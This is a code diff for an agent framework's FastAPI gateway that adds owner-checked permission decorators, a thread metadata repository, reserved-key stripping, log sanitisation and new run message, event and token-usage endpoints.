||||
if existing.get("thread_id") != thread_id or existing.get("run_id") != run_id:
|
||||
raise HTTPException(status_code=404, detail=f"Feedback {feedback_id} not found in run {run_id}")
|
||||
deleted = await feedback_repo.delete(feedback_id)
|
||||
if not deleted:
|
||||
raise HTTPException(status_code=404, detail=f"Feedback {feedback_id} not found")
|
||||
return {"success": True}
|
||||
@@ -7,7 +7,7 @@ from fastapi import APIRouter, HTTPException
|
||||
from pydantic import BaseModel, Field
|
||||
|
||||
from app.gateway.path_utils import resolve_thread_virtual_path
|
||||
from deerflow.agents.lead_agent.prompt import clear_skills_system_prompt_cache
|
||||
from deerflow.agents.lead_agent.prompt import refresh_skills_system_prompt_cache_async
|
||||
from deerflow.config.extensions_config import ExtensionsConfig, SkillStateConfig, get_extensions_config, reload_extensions_config
|
||||
from deerflow.skills import Skill, load_skills
|
||||
from deerflow.skills.installer import SkillAlreadyExistsError, install_skill_from_archive
|
||||
@@ -119,6 +119,7 @@ async def install_skill(request: SkillInstallRequest) -> SkillInstallResponse:
|
||||
try:
|
||||
skill_file_path = resolve_thread_virtual_path(request.thread_id, request.path)
|
||||
result = install_skill_from_archive(skill_file_path)
|
||||
await refresh_skills_system_prompt_cache_async()
|
||||
return SkillInstallResponse(**result)
|
||||
except FileNotFoundError as e:
|
||||
raise HTTPException(status_code=404, detail=str(e))
|
||||
@@ -181,7 +182,7 @@ async def update_custom_skill(skill_name: str, request: CustomSkillUpdateRequest
|
||||
"scanner": {"decision": scan.decision, "reason": scan.reason},
|
||||
},
|
||||
)
|
||||
clear_skills_system_prompt_cache()
|
||||
await refresh_skills_system_prompt_cache_async()
|
||||
return await get_custom_skill(skill_name)
|
||||
except HTTPException:
|
||||
raise
|
||||
@@ -213,7 +214,7 @@ async def delete_custom_skill(skill_name: str) -> dict[str, bool]:
|
||||
},
|
||||
)
|
||||
shutil.rmtree(skill_dir)
|
||||
clear_skills_system_prompt_cache()
|
||||
await refresh_skills_system_prompt_cache_async()
|
||||
return {"success": True}
|
||||
except FileNotFoundError as e:
|
||||
raise HTTPException(status_code=404, detail=str(e))
|
||||
@@ -268,7 +269,7 @@ async def rollback_custom_skill(skill_name: str, request: SkillRollbackRequest)
|
||||
raise HTTPException(status_code=400, detail=f"Rollback blocked by security scanner: {scan.reason}")
|
||||
atomic_write(skill_file, target_content)
|
||||
append_history(skill_name, history_entry)
|
||||
clear_skills_system_prompt_cache()
|
||||
await refresh_skills_system_prompt_cache_async()
|
||||
return await get_custom_skill(skill_name)
|
||||
except HTTPException:
|
||||
raise
|
||||
@@ -337,6 +338,7 @@ async def update_skill(skill_name: str, request: SkillUpdateRequest) -> SkillRes
|
||||
|
||||
logger.info(f"Skills configuration updated and saved to: {config_path}")
|
||||
reload_extensions_config()
|
||||
await refresh_skills_system_prompt_cache_async()
|
||||
|
||||
skills = load_skills(enabled_only=False)
|
||||
updated_skill = next((s for s in skills if s.name == skill_name), None)
|
||||
|
||||
@@ -1,10 +1,11 @@
|
||||
import json
|
||||
import logging
|
||||
|
||||
from fastapi import APIRouter
|
||||
from fastapi import APIRouter, Request
|
||||
from langchain_core.messages import HumanMessage, SystemMessage
|
||||
from pydantic import BaseModel, Field
|
||||
|
||||
from app.gateway.authz import require_permission
|
||||
from deerflow.models import create_chat_model
|
||||
|
||||
logger = logging.getLogger(__name__)
|
||||
@@ -98,12 +99,13 @@ def _format_conversation(messages: list[SuggestionMessage]) -> str:
|
||||
summary="Generate Follow-up Questions",
|
||||
description="Generate short follow-up questions a user might ask next, based on recent conversation context.",
|
||||
)
|
||||
async def generate_suggestions(thread_id: str, request: SuggestionsRequest) -> SuggestionsResponse:
|
||||
if not request.messages:
|
||||
@require_permission("threads", "read", owner_check=True)
|
||||
async def generate_suggestions(thread_id: str, body: SuggestionsRequest, request: Request) -> SuggestionsResponse:
|
||||
if not body.messages:
|
||||
return SuggestionsResponse(suggestions=[])
|
||||
|
||||
n = request.n
|
||||
conversation = _format_conversation(request.messages)
|
||||
n = body.n
|
||||
conversation = _format_conversation(body.messages)
|
||||
if not conversation:
|
||||
return SuggestionsResponse(suggestions=[])
|
||||
|
||||
@@ -120,7 +122,7 @@ async def generate_suggestions(thread_id: str, request: SuggestionsRequest) -> S
|
||||
user_content = f"Conversation Context:\n{conversation}\n\nGenerate {n} follow-up questions"
|
||||
|
||||
try:
|
||||
model = create_chat_model(name=request.model_name, thinking_enabled=False)
|
||||
model = create_chat_model(name=body.model_name, thinking_enabled=False)
|
||||
response = await model.ainvoke([SystemMessage(content=system_instruction), HumanMessage(content=user_content)])
|
||||
raw = _extract_response_text(response.content)
|
||||
suggestions = _parse_json_string_list(raw) or []
|
||||
|
||||
@@ -19,7 +19,8 @@ from fastapi import APIRouter, HTTPException, Query, Request
|
||||
from fastapi.responses import Response, StreamingResponse
|
||||
from pydantic import BaseModel, Field
|
||||
|
||||
from app.gateway.deps import get_checkpointer, get_run_manager, get_stream_bridge
|
||||
from app.gateway.authz import require_permission
|
||||
from app.gateway.deps import get_checkpointer, get_run_event_store, get_run_manager, get_run_store, get_stream_bridge
|
||||
from app.gateway.services import sse_consumer, start_run
|
||||
from deerflow.runtime import RunRecord, serialize_channel_values
|
||||
|
||||
@@ -53,6 +54,7 @@ class RunCreateRequest(BaseModel):
|
||||
after_seconds: float | None = Field(default=None, description="Delayed execution")
|
||||
if_not_exists: Literal["reject", "create"] = Field(default="create", description="Thread creation policy")
|
||||
feedback_keys: list[str] | None = Field(default=None, description="LangSmith feedback keys")
|
||||
follow_up_to_run_id: str | None = Field(default=None, description="Run ID this message follows up on. Auto-detected from latest successful run if not provided.")
|
||||
|
||||
|
||||
class RunResponse(BaseModel):
|
||||
@@ -92,6 +94,7 @@ def _record_to_response(record: RunRecord) -> RunResponse:
|
||||
|
||||
|
||||
@router.post("/{thread_id}/runs", response_model=RunResponse)
|
||||
@require_permission("runs", "create", owner_check=True, require_existing=True)
|
||||
async def create_run(thread_id: str, body: RunCreateRequest, request: Request) -> RunResponse:
|
||||
"""Create a background run (returns immediately)."""
|
||||
record = await start_run(body, thread_id, request)
|
||||
@@ -99,6 +102,7 @@ async def create_run(thread_id: str, body: RunCreateRequest, request: Request) -
|
||||
|
||||
|
||||
@router.post("/{thread_id}/runs/stream")
|
||||
@require_permission("runs", "create", owner_check=True, require_existing=True)
|
||||
async def stream_run(thread_id: str, body: RunCreateRequest, request: Request) -> StreamingResponse:
|
||||
"""Create a run and stream events via SSE.
|
||||
|
||||
@@ -126,6 +130,7 @@ async def stream_run(thread_id: str, body: RunCreateRequest, request: Request) -
|
||||
|
||||
|
||||
@router.post("/{thread_id}/runs/wait", response_model=dict)
|
||||
@require_permission("runs", "create", owner_check=True, require_existing=True)
|
||||
async def wait_run(thread_id: str, body: RunCreateRequest, request: Request) -> dict:
|
||||
"""Create a run and block until it completes, returning the final state."""
|
||||
record = await start_run(body, thread_id, request)
|
||||
@@ -151,6 +156,7 @@ async def wait_run(thread_id: str, body: RunCreateRequest, request: Request) ->
|
||||
|
||||
|
||||
@router.get("/{thread_id}/runs", response_model=list[RunResponse])
|
||||
@require_permission("runs", "read", owner_check=True)
|
||||
async def list_runs(thread_id: str, request: Request) -> list[RunResponse]:
|
||||
"""List all runs for a thread."""
|
||||
run_mgr = get_run_manager(request)
|
||||
@@ -159,6 +165,7 @@ async def list_runs(thread_id: str, request: Request) -> list[RunResponse]:
|
||||
|
||||
|
||||
@router.get("/{thread_id}/runs/{run_id}", response_model=RunResponse)
|
||||
@require_permission("runs", "read", owner_check=True)
|
||||
async def get_run(thread_id: str, run_id: str, request: Request) -> RunResponse:
|
||||
"""Get details of a specific run."""
|
||||
run_mgr = get_run_manager(request)
|
||||
@@ -169,6 +176,7 @@ async def get_run(thread_id: str, run_id: str, request: Request) -> RunResponse:
|
||||
|
||||
|
||||
@router.post("/{thread_id}/runs/{run_id}/cancel")
|
||||
@require_permission("runs", "cancel", owner_check=True, require_existing=True)
|
||||
async def cancel_run(
|
||||
thread_id: str,
|
||||
run_id: str,
|
||||
@@ -206,6 +214,7 @@ async def cancel_run(
|
||||
|
||||
|
||||
@router.get("/{thread_id}/runs/{run_id}/join")
|
||||
@require_permission("runs", "read", owner_check=True)
|
||||
async def join_run(thread_id: str, run_id: str, request: Request) -> StreamingResponse:
|
||||
"""Join an existing run's SSE stream."""
|
||||
bridge = get_stream_bridge(request)
|
||||
@@ -226,6 +235,7 @@ async def join_run(thread_id: str, run_id: str, request: Request) -> StreamingRe
|
||||
|
||||
|
||||
@router.api_route("/{thread_id}/runs/{run_id}/stream", methods=["GET", "POST"], response_model=None)
|
||||
@require_permission("runs", "read", owner_check=True)
|
||||
async def stream_existing_run(
|
||||
thread_id: str,
|
||||
run_id: str,
|
||||
@@ -265,3 +275,54 @@ async def stream_existing_run(
|
||||
"X-Accel-Buffering": "no",
|
||||
},
|
||||
)
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Messages / Events / Token usage endpoints
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
|
||||
@router.get("/{thread_id}/messages")
|
||||
@require_permission("runs", "read", owner_check=True)
|
||||
async def list_thread_messages(
|
||||
thread_id: str,
|
||||
request: Request,
|
||||
limit: int = Query(default=50, le=200),
|
||||
before_seq: int | None = Query(default=None),
|
||||
after_seq: int | None = Query(default=None),
|
||||
) -> list[dict]:
|
||||
"""Return displayable messages for a thread (across all runs)."""
|
||||
event_store = get_run_event_store(request)
|
||||
return await event_store.list_messages(thread_id, limit=limit, before_seq=before_seq, after_seq=after_seq)
|
||||
|
||||
|
||||
@router.get("/{thread_id}/runs/{run_id}/messages")
|
||||
@require_permission("runs", "read", owner_check=True)
|
||||
async def list_run_messages(thread_id: str, run_id: str, request: Request) -> list[dict]:
|
||||
"""Return displayable messages for a specific run."""
|
||||
event_store = get_run_event_store(request)
|
||||
return await event_store.list_messages_by_run(thread_id, run_id)
|
||||
|
||||
|
||||
@router.get("/{thread_id}/runs/{run_id}/events")
|
||||
@require_permission("runs", "read", owner_check=True)
|
||||
async def list_run_events(
|
||||
thread_id: str,
|
||||
run_id: str,
|
||||
request: Request,
|
||||
event_types: str | None = Query(default=None),
|
||||
limit: int = Query(default=500, le=2000),
|
||||
) -> list[dict]:
|
||||
"""Return the full event stream for a run (debug/audit)."""
|
||||
event_store = get_run_event_store(request)
|
||||
types = event_types.split(",") if event_types else None
|
||||
return await event_store.list_events(thread_id, run_id, event_types=types, limit=limit)
|
||||
|
||||
|
||||
@router.get("/{thread_id}/token-usage")
|
||||
@require_permission("threads", "read", owner_check=True)
|
||||
async def thread_token_usage(thread_id: str, request: Request) -> dict:
|
||||
"""Thread-level token usage aggregation."""
|
||||
run_store = get_run_store(request)
|
||||
agg = await run_store.aggregate_tokens_by_thread(thread_id)
|
||||
return {"thread_id": thread_id, **agg}
|
||||
|
||||
@@ -18,23 +18,34 @@ import uuid
|
||||
from typing import Any
|
||||
|
||||
from fastapi import APIRouter, HTTPException, Request
|
||||
from pydantic import BaseModel, Field
|
||||
from pydantic import BaseModel, Field, field_validator
|
||||
|
||||
from app.gateway.deps import get_checkpointer, get_store
|
||||
from app.gateway.authz import require_permission
|
||||
from app.gateway.deps import get_checkpointer
|
||||
from app.gateway.utils import sanitize_log_param
|
||||
from deerflow.config.paths import Paths, get_paths
|
||||
from deerflow.runtime import serialize_channel_values
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Store namespace
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
THREADS_NS: tuple[str, ...] = ("threads",)
|
||||
"""Namespace used by the Store for thread metadata records."""
|
||||
|
||||
logger = logging.getLogger(__name__)
|
||||
router = APIRouter(prefix="/api/threads", tags=["threads"])
|
||||
|
||||
|
||||
# Metadata keys that the server controls; clients are not allowed to set
|
||||
# them. Pydantic ``@field_validator("metadata")`` strips them on every
|
||||
# inbound model below so a malicious client cannot reflect a forged
|
||||
# owner identity through the API surface. Defense-in-depth — the
|
||||
# row-level invariant is still ``threads_meta.owner_id`` populated from
|
||||
# the auth contextvar; this list closes the metadata-blob echo gap.
|
||||
_SERVER_RESERVED_METADATA_KEYS: frozenset[str] = frozenset({"owner_id", "user_id"})
|
||||
|
||||
|
||||
def _strip_reserved_metadata(metadata: dict[str, Any] | None) -> dict[str, Any]:
|
||||
"""Return ``metadata`` with server-controlled keys removed."""
|
||||
if not metadata:
|
||||
return metadata or {}
|
||||
return {k: v for k, v in metadata.items() if k not in _SERVER_RESERVED_METADATA_KEYS}
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Response / request models
|
||||
# ---------------------------------------------------------------------------
|
||||
@@ -63,8 +74,11 @@ class ThreadCreateRequest(BaseModel):
|
||||
"""Request body for creating a thread."""
|
||||
|
||||
thread_id: str | None = Field(default=None, description="Optional thread ID (auto-generated if omitted)")
|
||||
assistant_id: str | None = Field(default=None, description="Associate thread with an assistant")
|
||||
metadata: dict[str, Any] = Field(default_factory=dict, description="Initial metadata")
|
||||
|
||||
_strip_reserved = field_validator("metadata")(classmethod(lambda cls, v: _strip_reserved_metadata(v)))
|
||||
|
||||
|
||||
class ThreadSearchRequest(BaseModel):
|
||||
"""Request body for searching threads."""
|
||||
@@ -93,6 +107,8 @@ class ThreadPatchRequest(BaseModel):
|
||||
|
||||
metadata: dict[str, Any] = Field(default_factory=dict, description="Metadata to merge")
|
||||
|
||||
_strip_reserved = field_validator("metadata")(classmethod(lambda cls, v: _strip_reserved_metadata(v)))
|
||||
|
||||
|
||||
class ThreadStateUpdateRequest(BaseModel):
|
||||
"""Request body for updating thread state (human-in-the-loop resume)."""
|
||||
@@ -135,61 +151,16 @@ def _delete_thread_data(thread_id: str, paths: Paths | None = None) -> ThreadDel
|
||||
raise HTTPException(status_code=422, detail=str(exc)) from exc
|
||||
except FileNotFoundError:
|
||||
# Not critical — thread data may not exist on disk
|
||||
logger.debug("No local thread data to delete for %s", thread_id)
|
||||
logger.debug("No local thread data to delete for %s", sanitize_log_param(thread_id))
|
||||
return ThreadDeleteResponse(success=True, message=f"No local data for {thread_id}")
|
||||
except Exception as exc:
|
||||
logger.exception("Failed to delete thread data for %s", thread_id)
|
||||
logger.exception("Failed to delete thread data for %s", sanitize_log_param(thread_id))
|
||||
raise HTTPException(status_code=500, detail="Failed to delete local thread data.") from exc
|
||||
|
||||
logger.info("Deleted local thread data for %s", thread_id)
|
||||
logger.info("Deleted local thread data for %s", sanitize_log_param(thread_id))
|
||||
return ThreadDeleteResponse(success=True, message=f"Deleted local thread data for {thread_id}")
|
||||
|
||||
|
||||
async def _store_get(store, thread_id: str) -> dict | None:
|
||||
"""Fetch a thread record from the Store; returns ``None`` if absent."""
|
||||
item = await store.aget(THREADS_NS, thread_id)
|
||||
return item.value if item is not None else None
|
||||
|
||||
|
||||
async def _store_put(store, record: dict) -> None:
|
||||
"""Write a thread record to the Store."""
|
||||
await store.aput(THREADS_NS, record["thread_id"], record)
|
||||
|
||||
|
||||
async def _store_upsert(store, thread_id: str, *, metadata: dict | None = None, values: dict | None = None) -> None:
|
||||
"""Create or refresh a thread record in the Store.
|
||||
|
||||
On creation the record is written with ``status="idle"``. On update only
|
||||
``updated_at`` (and optionally ``metadata`` / ``values``) are changed so
|
||||
that existing fields are preserved.
|
||||
|
||||
``values`` carries the agent-state snapshot exposed to the frontend
|
||||
(currently just ``{"title": "..."}``).
|
||||
"""
|
||||
now = time.time()
|
||||
existing = await _store_get(store, thread_id)
|
||||
if existing is None:
|
||||
await _store_put(
|
||||
store,
|
||||
{
|
||||
"thread_id": thread_id,
|
||||
"status": "idle",
|
||||
"created_at": now,
|
||||
"updated_at": now,
|
||||
"metadata": metadata or {},
|
||||
"values": values or {},
|
||||
},
|
||||
)
|
||||
else:
|
||||
val = dict(existing)
|
||||
val["updated_at"] = now
|
||||
if metadata:
|
||||
val.setdefault("metadata", {}).update(metadata)
|
||||
if values:
|
||||
val.setdefault("values", {}).update(values)
|
||||
await _store_put(store, val)
|
||||
|
||||
|
||||
def _derive_thread_status(checkpoint_tuple) -> str:
|
||||
"""Derive thread status from checkpoint metadata."""
|
||||
if checkpoint_tuple is None:
|
||||
@@ -215,23 +186,19 @@ def _derive_thread_status(checkpoint_tuple) -> str:
|
||||
|
||||
|
||||
@router.delete("/{thread_id}", response_model=ThreadDeleteResponse)
|
||||
@require_permission("threads", "delete", owner_check=True, require_existing=True)
|
||||
async def delete_thread_data(thread_id: str, request: Request) -> ThreadDeleteResponse:
|
||||
"""Delete local persisted filesystem data for a thread.
|
||||
|
||||
Cleans DeerFlow-managed thread directories, removes checkpoint data,
|
||||
and removes the thread record from the Store.
|
||||
and removes the thread_meta row from the configured ThreadMetaStore
|
||||
(sqlite or memory).
|
||||
"""
|
||||
from app.gateway.deps import get_thread_meta_repo
|
||||
|
||||
# Clean local filesystem
|
||||
response = _delete_thread_data(thread_id)
|
||||
|
||||
# Remove from Store (best-effort)
|
||||
store = get_store(request)
|
||||
if store is not None:
|
||||
try:
|
||||
await store.adelete(THREADS_NS, thread_id)
|
||||
except Exception:
|
||||
logger.debug("Could not delete store record for thread %s (not critical)", thread_id)
|
||||
|
||||
# Remove checkpoints (best-effort)
|
||||
checkpointer = getattr(request.app.state, "checkpointer", None)
|
||||
if checkpointer is not None:
|
||||
@@ -239,7 +206,15 @@ async def delete_thread_data(thread_id: str, request: Request) -> ThreadDeleteRe
|
||||
if hasattr(checkpointer, "adelete_thread"):
|
||||
await checkpointer.adelete_thread(thread_id)
|
||||
except Exception:
|
||||
logger.debug("Could not delete checkpoints for thread %s (not critical)", thread_id)
|
||||
logger.debug("Could not delete checkpoints for thread %s (not critical)", sanitize_log_param(thread_id))
|
||||
|
||||
# Remove thread_meta row (best-effort) — required for sqlite backend
|
||||
# so the deleted thread no longer appears in /threads/search.
|
||||
try:
|
||||
thread_meta_repo = get_thread_meta_repo(request)
|
||||
await thread_meta_repo.delete(thread_id)
|
||||
except Exception:
|
||||
logger.debug("Could not delete thread_meta for %s (not critical)", sanitize_log_param(thread_id))
|
||||
|
||||
return response
|
||||
|
||||
@@ -248,43 +223,40 @@ async def delete_thread_data(thread_id: str, request: Request) -> ThreadDeleteRe
|
||||
async def create_thread(body: ThreadCreateRequest, request: Request) -> ThreadResponse:
|
||||
"""Create a new thread.
|
||||
|
||||
The thread record is written to the Store (for fast listing) and an
|
||||
empty checkpoint is written to the checkpointer (for state reads).
|
||||
Writes a thread_meta record (so the thread appears in /threads/search)
|
||||
and an empty checkpoint (so state endpoints work immediately).
|
||||
Idempotent: returns the existing record when ``thread_id`` already exists.
|
||||
"""
|
||||
store = get_store(request)
|
||||
from app.gateway.deps import get_thread_meta_repo
|
||||
|
||||
checkpointer = get_checkpointer(request)
|
||||
thread_meta_repo = get_thread_meta_repo(request)
|
||||
thread_id = body.thread_id or str(uuid.uuid4())
|
||||
now = time.time()
|
||||
# ``body.metadata`` is already stripped of server-reserved keys by
|
||||
# ``ThreadCreateRequest._strip_reserved`` — see the model definition.
|
||||
|
||||
# Idempotency: return existing record from Store when already present
|
||||
if store is not None:
|
||||
existing_record = await _store_get(store, thread_id)
|
||||
if existing_record is not None:
|
||||
return ThreadResponse(
|
||||
thread_id=thread_id,
|
||||
status=existing_record.get("status", "idle"),
|
||||
created_at=str(existing_record.get("created_at", "")),
|
||||
updated_at=str(existing_record.get("updated_at", "")),
|
||||
metadata=existing_record.get("metadata", {}),
|
||||
)
|
||||
# Idempotency: return existing record when already present
|
||||
existing_record = await thread_meta_repo.get(thread_id)
|
||||
if existing_record is not None:
|
||||
return ThreadResponse(
|
||||
thread_id=thread_id,
|
||||
status=existing_record.get("status", "idle"),
|
||||
created_at=str(existing_record.get("created_at", "")),
|
||||
updated_at=str(existing_record.get("updated_at", "")),
|
||||
metadata=existing_record.get("metadata", {}),
|
||||
)
|
||||
|
||||
# Write thread record to Store
|
||||
if store is not None:
|
||||
try:
|
||||
await _store_put(
|
||||
store,
|
||||
{
|
||||
"thread_id": thread_id,
|
||||
"status": "idle",
|
||||
"created_at": now,
|
||||
"updated_at": now,
|
||||
"metadata": body.metadata,
|
||||
},
|
||||
)
|
||||
except Exception:
|
||||
logger.exception("Failed to write thread %s to store", thread_id)
|
||||
raise HTTPException(status_code=500, detail="Failed to create thread")
|
||||
# Write thread_meta so the thread appears in /threads/search immediately
|
||||
try:
|
||||
await thread_meta_repo.create(
|
||||
thread_id,
|
||||
assistant_id=getattr(body, "assistant_id", None),
|
||||
metadata=body.metadata,
|
||||
)
|
||||
except Exception:
|
||||
logger.exception("Failed to write thread_meta for %s", sanitize_log_param(thread_id))
|
||||
raise HTTPException(status_code=500, detail="Failed to create thread")
|
||||
|
||||
# Write an empty checkpoint so state endpoints work immediately
|
||||
config = {"configurable": {"thread_id": thread_id, "checkpoint_ns": ""}}
|
||||
@@ -301,10 +273,10 @@ async def create_thread(body: ThreadCreateRequest, request: Request) -> ThreadRe
|
||||
}
|
||||
await checkpointer.aput(config, empty_checkpoint(), ckpt_metadata, {})
|
||||
except Exception:
|
||||
logger.exception("Failed to create checkpoint for thread %s", thread_id)
|
||||
logger.exception("Failed to create checkpoint for thread %s", sanitize_log_param(thread_id))
|
||||
raise HTTPException(status_code=500, detail="Failed to create thread")
|
||||
|
||||
logger.info("Thread created: %s", thread_id)
|
||||
logger.info("Thread created: %s", sanitize_log_param(thread_id))
|
||||
return ThreadResponse(
|
||||
thread_id=thread_id,
|
||||
status="idle",
|
||||
@@ -318,166 +290,91 @@ async def create_thread(body: ThreadCreateRequest, request: Request) -> ThreadRe
|
||||
async def search_threads(body: ThreadSearchRequest, request: Request) -> list[ThreadResponse]:
|
||||
"""Search and list threads.
|
||||
|
||||
Two-phase approach:
|
||||
|
||||
**Phase 1 — Store (fast path, O(threads))**: returns threads that were
|
||||
created or run through this Gateway. Store records are tiny metadata
|
||||
dicts so fetching all of them at once is cheap.
|
||||
|
||||
**Phase 2 — Checkpointer supplement (lazy migration)**: threads that
|
||||
were created directly by LangGraph Server (and therefore absent from the
|
||||
Store) are discovered here by iterating the shared checkpointer. Any
|
||||
newly found thread is immediately written to the Store so that the next
|
||||
search skips Phase 2 for that thread — the Store converges to a full
|
||||
index over time without a one-shot migration job.
|
||||
Delegates to the configured ThreadMetaStore implementation
|
||||
(SQL-backed for sqlite/postgres, Store-backed for memory mode).
|
||||
"""
|
||||
store = get_store(request)
|
||||
checkpointer = get_checkpointer(request)
|
||||
from app.gateway.deps import get_thread_meta_repo
|
||||
|
||||
# -----------------------------------------------------------------------
|
||||
# Phase 1: Store
|
||||
# -----------------------------------------------------------------------
|
||||
merged: dict[str, ThreadResponse] = {}
|
||||
|
||||
if store is not None:
|
||||
try:
|
||||
items = await store.asearch(THREADS_NS, limit=10_000)
|
||||
except Exception:
|
||||
logger.warning("Store search failed — falling back to checkpointer only", exc_info=True)
|
||||
items = []
|
||||
|
||||
for item in items:
|
||||
val = item.value
|
||||
merged[val["thread_id"]] = ThreadResponse(
|
||||
thread_id=val["thread_id"],
|
||||
status=val.get("status", "idle"),
|
||||
created_at=str(val.get("created_at", "")),
|
||||
updated_at=str(val.get("updated_at", "")),
|
||||
metadata=val.get("metadata", {}),
|
||||
values=val.get("values", {}),
|
||||
)
|
||||
|
||||
# -----------------------------------------------------------------------
|
||||
# Phase 2: Checkpointer supplement
|
||||
# Discovers threads not yet in the Store (e.g. created by LangGraph
|
||||
# Server) and lazily migrates them so future searches skip this phase.
|
||||
# -----------------------------------------------------------------------
|
||||
try:
|
||||
async for checkpoint_tuple in checkpointer.alist(None):
|
||||
cfg = getattr(checkpoint_tuple, "config", {})
|
||||
thread_id = cfg.get("configurable", {}).get("thread_id")
|
||||
if not thread_id or thread_id in merged:
|
||||
continue
|
||||
|
||||
# Skip sub-graph checkpoints (checkpoint_ns is non-empty for those)
|
||||
if cfg.get("configurable", {}).get("checkpoint_ns", ""):
|
||||
continue
|
||||
|
||||
ckpt_meta = getattr(checkpoint_tuple, "metadata", {}) or {}
|
||||
# Strip LangGraph internal keys from the user-visible metadata dict
|
||||
user_meta = {k: v for k, v in ckpt_meta.items() if k not in ("created_at", "updated_at", "step", "source", "writes", "parents")}
|
||||
|
||||
# Extract state values (title) from the checkpoint's channel_values
|
||||
checkpoint_data = getattr(checkpoint_tuple, "checkpoint", {}) or {}
|
||||
channel_values = checkpoint_data.get("channel_values", {})
|
||||
ckpt_values = {}
|
||||
if title := channel_values.get("title"):
|
||||
ckpt_values["title"] = title
|
||||
|
||||
thread_resp = ThreadResponse(
|
||||
thread_id=thread_id,
|
||||
status=_derive_thread_status(checkpoint_tuple),
|
||||
created_at=str(ckpt_meta.get("created_at", "")),
|
||||
updated_at=str(ckpt_meta.get("updated_at", ckpt_meta.get("created_at", ""))),
|
||||
metadata=user_meta,
|
||||
values=ckpt_values,
|
||||
)
|
||||
merged[thread_id] = thread_resp
|
||||
|
||||
# Lazy migration — write to Store so the next search finds it there
|
||||
if store is not None:
|
||||
try:
|
||||
await _store_upsert(store, thread_id, metadata=user_meta, values=ckpt_values or None)
|
||||
except Exception:
|
||||
logger.debug("Failed to migrate thread %s to store (non-fatal)", thread_id)
|
||||
except Exception:
|
||||
logger.exception("Checkpointer scan failed during thread search")
|
||||
# Don't raise — return whatever was collected from Store + partial scan
|
||||
|
||||
# -----------------------------------------------------------------------
|
||||
# Phase 3: Filter → sort → paginate
|
||||
# -----------------------------------------------------------------------
|
||||
results = list(merged.values())
|
||||
|
||||
if body.metadata:
|
||||
results = [r for r in results if all(r.metadata.get(k) == v for k, v in body.metadata.items())]
|
||||
|
||||
if body.status:
|
||||
results = [r for r in results if r.status == body.status]
|
||||
|
||||
results.sort(key=lambda r: r.updated_at, reverse=True)
|
||||
return results[body.offset : body.offset + body.limit]
|
||||
repo = get_thread_meta_repo(request)
|
||||
rows = await repo.search(
|
||||
metadata=body.metadata or None,
|
||||
status=body.status,
|
||||
limit=body.limit,
|
||||
offset=body.offset,
|
||||
)
|
||||
return [
|
||||
ThreadResponse(
|
||||
thread_id=r["thread_id"],
|
||||
status=r.get("status", "idle"),
|
||||
created_at=r.get("created_at", ""),
|
||||
updated_at=r.get("updated_at", ""),
|
||||
metadata=r.get("metadata", {}),
|
||||
values={"title": r["display_name"]} if r.get("display_name") else {},
|
||||
interrupts={},
|
||||
)
|
||||
for r in rows
|
||||
]
|
||||
|
||||
|
||||
@router.patch("/{thread_id}", response_model=ThreadResponse)
|
||||
@require_permission("threads", "write", owner_check=True, require_existing=True)
|
||||
async def patch_thread(thread_id: str, body: ThreadPatchRequest, request: Request) -> ThreadResponse:
|
||||
"""Merge metadata into a thread record."""
|
||||
store = get_store(request)
|
||||
if store is None:
|
||||
raise HTTPException(status_code=503, detail="Store not available")
|
||||
from app.gateway.deps import get_thread_meta_repo
|
||||
|
||||
record = await _store_get(store, thread_id)
|
||||
thread_meta_repo = get_thread_meta_repo(request)
|
||||
record = await thread_meta_repo.get(thread_id)
|
||||
if record is None:
|
||||
raise HTTPException(status_code=404, detail=f"Thread {thread_id} not found")
|
||||
|
||||
now = time.time()
|
||||
updated = dict(record)
|
||||
updated.setdefault("metadata", {}).update(body.metadata)
|
||||
updated["updated_at"] = now
|
||||
|
||||
# ``body.metadata`` already stripped by ``ThreadPatchRequest._strip_reserved``.
|
||||
try:
|
||||
await _store_put(store, updated)
|
||||
await thread_meta_repo.update_metadata(thread_id, body.metadata)
|
||||
except Exception:
|
||||
logger.exception("Failed to patch thread %s", thread_id)
|
||||
logger.exception("Failed to patch thread %s", sanitize_log_param(thread_id))
|
||||
raise HTTPException(status_code=500, detail="Failed to update thread")
|
||||
|
||||
# Re-read to get the merged metadata + refreshed updated_at
|
||||
record = await thread_meta_repo.get(thread_id) or record
|
||||
return ThreadResponse(
|
||||
thread_id=thread_id,
|
||||
status=updated.get("status", "idle"),
|
||||
created_at=str(updated.get("created_at", "")),
|
||||
updated_at=str(now),
|
||||
metadata=updated.get("metadata", {}),
|
||||
status=record.get("status", "idle"),
|
||||
created_at=str(record.get("created_at", "")),
|
||||
updated_at=str(record.get("updated_at", "")),
|
||||
metadata=record.get("metadata", {}),
|
||||
)
|
||||
|
||||
|
||||
@router.get("/{thread_id}", response_model=ThreadResponse)
|
||||
@require_permission("threads", "read", owner_check=True)
|
||||
async def get_thread(thread_id: str, request: Request) -> ThreadResponse:
|
||||
"""Get thread info.
|
||||
|
||||
Reads metadata from the Store and derives the accurate execution
|
||||
status from the checkpointer. Falls back to the checkpointer alone
|
||||
for threads that pre-date Store adoption (backward compat).
|
||||
Reads metadata from the ThreadMetaStore and derives the accurate
|
||||
execution status from the checkpointer. Falls back to the checkpointer
|
||||
alone for threads that pre-date ThreadMetaStore adoption (backward compat).
|
||||
"""
|
||||
store = get_store(request)
|
||||
from app.gateway.deps import get_thread_meta_repo
|
||||
|
||||
thread_meta_repo = get_thread_meta_repo(request)
|
||||
checkpointer = get_checkpointer(request)
|
||||
|
||||
record: dict | None = None
|
||||
if store is not None:
|
||||
record = await _store_get(store, thread_id)
|
||||
record: dict | None = await thread_meta_repo.get(thread_id)
|
||||
|
||||
# Derive accurate status from the checkpointer
|
||||
config = {"configurable": {"thread_id": thread_id, "checkpoint_ns": ""}}
|
||||
try:
|
||||
checkpoint_tuple = await checkpointer.aget_tuple(config)
|
||||
except Exception:
|
||||
logger.exception("Failed to get checkpoint for thread %s", thread_id)
|
||||
logger.exception("Failed to get checkpoint for thread %s", sanitize_log_param(thread_id))
|
||||
raise HTTPException(status_code=500, detail="Failed to get thread")
|
||||
|
||||
if record is None and checkpoint_tuple is None:
|
||||
raise HTTPException(status_code=404, detail=f"Thread {thread_id} not found")
|
||||
|
||||
# If the thread exists in the checkpointer but not the store (e.g. legacy
|
